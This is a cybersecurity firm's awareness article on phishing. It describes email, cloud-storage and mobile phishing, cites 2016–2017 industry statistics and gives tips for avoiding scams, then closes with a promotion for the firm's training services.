Phishing is the most popular and potent attack vector and is categorized as a social engineering attack often used to steal user data, including login credentials and credit card numbers. The goal of phishing via social engineering is to trick the victim into believing that the message they receive from the phishing perpetrator contains something they want or need — a request from their bank, for instance, or a note from someone within their company — and to click a link or download an attachment. The attacker's primary goal is to compromise systems to obtain usernames, passwords and other account and/or financial data.
In fact, with the right phishing network in place, some information gathering and the proper bait, attackers can gain access to just about any company or organization — even government agencies — and inflict devastating damage. The way phishing scams operate is pretty straightforward. Once a victim has fallen for the ploy and unsuspectingly entered their personal information on a forged site or in response to an email, the attacker then uses that information for personal gain.
Phishing is not only highly common, but it’s arguably the most damaging and high-profile cybersecurity threat facing organizations today.
- Businesses are seeing more malicious emails flooding their inboxes. The volume of spam emails increased 4x in 2016. Source: IBM Threat Intelligence Index 2017
- Email is still the #1 delivery vehicle for most malware (just not ransomware). 1 in 131 emails contained malware in 2016, the highest rate in 5 years. Source: Symantec 2017 Internet Security Threat Report (ISTR)
- Fake invoice messages are the #1 type of phishing lure. Source: Symantec 2017 Internet Security Threat Report (ISTR)
- Apple IDs are the #1 target for credential theft emails. Source: Proofpoint 2017 Human Factor Report
- More than 400 businesses are targeted by business email compromise (BEC) scams every day. Source: Symantec 2017 Internet Security Threat Report (ISTR)
- Reports of W-2 phishing emails increased 870% in 2017. Source: IRS Return Integrity Compliance Services
- 76% of organizations reported being the victim of a phishing attack in 2016. Source: Wombat Security State of the Phish 2017
There are three common phishing vectors that you need to keep an eye out for:
1. Email Phishing:
From business executives to internet surfers at home, anyone who opens an unknown email and trusts its content is vulnerable to this classic manipulation tactic. Researchers at Symantec suggest that almost one in every 2,000 of these emails is a phishing email, meaning around 135 million phishing attacks are attempted every day. Most people simply don't have the time to carefully analyze every message that lands in their inbox and that's exactly what phishers are hoping to exploit in various ways.
How do you discern a real email versus a phishing scam? The best way to fight back is by staying educated on the signs, and by being vigilant. Make sure you check the URL for legitimacy. Hover over the link to see if it might be fake, and if it seems even remotely questionable, don’t click on it.
2. Cloud Storage Phishing:
Cloud service providers such as Amazon, Google, and Dropbox have recently become the target of phishing scammers. Generally, the scammers send victims attachments requesting that the user log into their cloud provider through a dummy portal, capturing private login information in the process. Many of the phishing campaigns targeting cloud storage providers contain lures (information to make phishing content appear more legitimate) saying that a document or picture has been shared with the victim and encourage them to sign into their account in order to view it. Being that many of us trust the cloud implicitly with our personal data, remain alert when an unknown attachment comes through.
3. Mobile Phishing:
More and more phishing scammers are shifting their focus towards attacking users through their smartphones, since mobile applications have become ideal vectors for attack. Mobile phishing is an emerging threat in today’s connected world. In a mobile phishing attack, an attacker usually sends an SMS message containing links to phishing web pages or applications which, if visited, ask for credentials.
Attacks can also be initiated via email messages loaded in the browser of mobile devices. It’s easy, really: unsuspecting users just download forged applications loaded with malware, and crooks then actively capture personal information and trick users into divulging passwords. Make sure you protect yourself by always reading app reviews before initiating downloads, keep security settings strict, and consider adopting a reliable, mobile security solution immediately.
Phishing has been around practically since the inception of the Internet, and it won't go away anytime soon. It is necessary for you to become familiar with the best ways to avoid phishing scams. Here are some tips to learn how to guard against them:
- Stay informed about phishing techniques. New phishing scams are being developed all the time. If you aren't staying on top of these new phishing techniques, you could inadvertently become a victim. Keep your eyes peeled for news about the latest phishing scams. By finding out about them as early as possible, you will be at a much lower risk of getting snared.
- Do not click on links, download files or open attachments in emails from unknown senders. It is best to open attachments only when you are expecting them and know exactly what they contain, even if you know the sender.
- Never email personal or financial information, even if you are close with the recipient. You never know who may gain access to your email account, or to the person’s account to whom you are emailing.
- Never enter personal information in a pop-up screen. It's never a good idea.
- Keep your browser updated. Security patches are routinely released for popular browsers. They are released in response to the security loopholes that phishers and other hackers inevitably discover and exploit. If you typically ignore messages about updating your browsers, put a stop to that habit. The minute an update is available, download and install it.
- Install an anti-phishing toolbar. Most popular Internet browsers can be customized with anti-phishing toolbars. Such toolbars run quick checks on the sites that you are visiting and compare them to lists of known phishing sites. If you stumble upon a malicious site, the toolbar will alert you to it. This is just one more layer of protection against phishing scams, and it is completely free.
Nobody wants to fall prey to a phishing scam. There’s a good reason that such scams will continue, though: they're successful enough for cybercriminals to make massive profits. Fortunately, there are ways to avoid becoming a victim.
Protect your staff against cyber threats with Align Cybersecurity™ Security Awareness Training.
Align Cybersecurity offers tailored, nimble and advanced cybersecurity solutions encompassing Vulnerability Assessments / Penetration Testing, Cybersecurity Risk Management as a Service (Align Risk CSR), Customized Cybersecurity Programs, Third Party Management, Managed Threat Protection (Align Guardian), Cybersecurity Training and more.
Seeking cyber intelligence? Download our National Cyber Security Awareness Month (NCSAM) Series Whitepaper below.
Cyber Lock. Image Credit: Align